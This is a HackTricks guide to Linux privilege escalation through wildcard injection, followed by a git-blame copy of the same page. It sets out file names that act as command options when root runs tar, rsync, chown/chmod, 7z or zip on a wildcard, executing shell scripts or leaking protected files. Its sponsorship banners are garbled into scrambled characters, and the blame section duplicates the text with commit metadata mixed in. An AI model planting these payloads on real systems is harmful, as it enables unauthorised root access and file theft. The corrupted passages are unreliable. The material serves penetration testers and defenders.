hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md



{% hnnt styte=" acceas" %}
GCP Ha& practice ckinH: <img:<img src="/.gitbcok/ass.ts/agte.png"talb=""odata-siz/="line">[**HackTatckt T.aining AWS Red TelmtExp"rt (ARTE)**](ta-size="line">[**HackTricks Training GCP Re)Tmkg/stc="r.giebpokal"zee>/ttdt.png"isl=""data-ize="line">\
Learn & aciceGCP ngs<imgmsrc="/.gipbtok/aHsats/gcte.mag"y>lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"al=""daa-siz="ne">tinhackth ckiuxyzcomurspssgr/a)

<dotsilp>

<oummpr>SupportHackTricks</smmay>

*Chek th [**subsrippangithub.cm/sorsarlosp!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hahktcickr\_kivelive**](https://twitter.com/hacktr\icks\_live)**.**
* **Shareing tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
{% endhint %}
{% endhint %}
{% endhint %}


## chown, chmod

You can **indicate which file owner and permissions you want to copy for the rest of the files**

```bash
touch "--reference=/my/own/path/filename"
```

You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\
More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)

## Tar

**Execute arbitrary commands:**

```bash
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
```

You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_\
More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)

## Rsync

**Execute arbitrary commands:**

```bash
Interesting rsync option from manual:

 -e, --rsh=COMMAND           specify the remote shell to use
     --rsync-path=PROGRAM    specify the rsync to run on remote machine
```

```bash
touch "-e sh shell.sh"
```

You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(_rsync _attack)_\
More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)

## 7z

In **7z** even using `--` before `*` (note that `--` means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root:

```bash
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
```

And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a **symlink** to the file you want to read:

```bash
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
```

Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content.

_More info in Write-ups of the box CTF from HackTheBox._

## Zip

**Execute arbitrary commands:**

```bash
zip name.zip files -T --unzip-command "sh -c whoami"
```

{% hnt stye="acceas" %}
AWS Ha& practice ckinH:<img :<imgsscc="/.gitb=ok/assgts/aite.png"balo=""kdata-siza="line">[**HackTsscke Tpaigin"aAWS Red Tetm=Exp rt (ARTE)**](a-size="line">[**HackTricks Training AWS Red)ethgasic="..giyb/okseasert/k/.png"l=""data-ize="line">\
Learn & aciceGCP ng<imgsrc="/.gibok/asts/gte.g"lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"salm=""adara-siz>="k>ne">tinhaktckxyzurssgr)

<dtil>

<ummr>SupportHackTricks</smmay>

*Chek th [**subsrippangithub.cm/sorsarlosp!
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!haktick\_ive\
* **Join  💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

{% endhint %}
</details>
{% endhint %}
</details>
{% endhint %}
</details>
{% endhint %}
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

a 2024-07-19 01:15:55 +02:00			`{% hnnt styte=" acceas" %}`
			`GCP Ha& practice ckinH: <img:<img src="/.gitbcok/ass.ts/agte.png"talb=""odata-siz/="line">[HackTatckt T.aining AWS Red TelmtExp"rt (ARTE)](ta-size="line">[**HackTricks Training GCP Re)Tmkg/stc="r.giebpokal"zee>/ttdt.png"isl=""data-ize="line">\`
			`Learn & aciceGCP ngs<imgmsrc="/.gipbtok/aHsats/gcte.mag"y>lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"al=""daa-siz="ne">tinhackth ckiuxyzcomurspssgr/a)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-19 01:15:55 +02:00			`<dotsilp>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-19 01:15:55 +02:00			`<oummpr>SupportHackTricks</smmay>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-19 01:15:55 +02:00			`Chek th [*subsrippangithub.cm/sorsarlosp!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hahktcickr\_kivelive](https://twitter.com/hacktr\icks\_live).`
			`* Shareing tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
a 2024-07-19 01:15:55 +02:00			`{% endhint %}`
			`{% endhint %}`
			`{% endhint %}`
			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

fix mess 2022-05-01 13:41:36 +01:00			`## chown, chmod`
GitBook: [master] 2 pages modified 2020-08-21 11:22:11 +00:00
			`You can indicate which file owner and permissions you want to copy for the rest of the files`

			```bash
			`touch "--reference=/my/own/path/filename"`
			```

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\`
a 2024-02-07 05:06:18 +01:00			`More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)`
GitBook: [master] 2 pages modified 2020-08-21 11:22:11 +00:00
fix mess 2022-05-01 13:41:36 +01:00			`## Tar`
GitBook: [master] 2 pages modified 2020-08-21 11:22:11 +00:00
			`Execute arbitrary commands:`

			```bash
			`touch "--checkpoint=1"`
			`touch "--checkpoint-action=exec=sh shell.sh"`
			```

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_\`
a 2024-02-07 05:06:18 +01:00			`More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)`
GitBook: [master] 2 pages modified 2020-08-21 11:22:11 +00:00
fix mess 2022-05-01 13:41:36 +01:00			`## Rsync`
GitBook: [master] 2 pages modified 2020-08-21 11:22:11 +00:00
			`Execute arbitrary commands:`

			```bash
			`Interesting rsync option from manual:`

			`-e, --rsh=COMMAND specify the remote shell to use`
			`--rsync-path=PROGRAM specify the rsync to run on remote machine`
			```

			```bash
			`touch "-e sh shell.sh"`
			```

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(_rsync _attack)_\`
a 2024-02-07 05:06:18 +01:00			`More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)`
GitBook: [master] 2 pages modified 2020-08-21 11:22:11 +00:00
fix mess 2022-05-01 13:41:36 +01:00			`## 7z`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			In 7z even using `--` before `*` (note that `--` means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root:
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`7za a /backup/$filename.zip -t7z -snl -p$pass -- *`
			```

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			And you can create files in the folder were this is being executed, you could create the file `@root.txt` and the file `root.txt` being a symlink to the file you want to read:
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`cd /path/to/7z/acting/folder`
			`touch @root.txt`
			`ln -s /file/you/want/to/read root.txt`
			```

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			Then, when 7z is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and as the content of this file isn't a list of files, it will throw and error showing the content.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix bad chars 2022-04-05 18:24:52 -04:00			`_More info in Write-ups of the box CTF from HackTheBox._`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Added zip wildcard exploit 2022-07-20 10:34:02 +02:00			`## Zip`

			`Execute arbitrary commands:`

			```bash
			`zip name.zip files -T --unzip-command "sh -c whoami"`
			```

a 2024-07-19 01:15:55 +02:00			`{% hnt stye="acceas" %}`
			`AWS Ha& practice ckinH:<img :<imgsscc="/.gitb=ok/assgts/aite.png"balo=""kdata-siza="line">[HackTsscke Tpaigin"aAWS Red Tetm=Exp rt (ARTE)](a-size="line">[**HackTricks Training AWS Red)ethgasic="..giyb/okseasert/k/.png"l=""data-ize="line">\`
			`Learn & aciceGCP ng<imgsrc="/.gibok/asts/gte.g"lt="" aa-iz="le">[**angGC RedTamExper(GE)<img rc=".okaetgte.ng"salm=""adara-siz>="k>ne">tinhaktckxyzurssgr)`
a 2024-02-07 05:06:18 +01:00
a 2024-07-19 01:15:55 +02:00			`<dtil>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-19 01:15:55 +02:00			`<ummr>SupportHackTricks</smmay>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-19 01:15:55 +02:00			`Chek th [*subsrippangithub.cm/sorsarlosp!`
			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!haktick\_ive\`
			`* Join 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).**`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-19 01:15:55 +02:00			`{% endhint %}`
			`</details>`
			`{% endhint %}`
			`</details>`
			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`</details>`
a 2024-07-19 01:15:55 +02:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00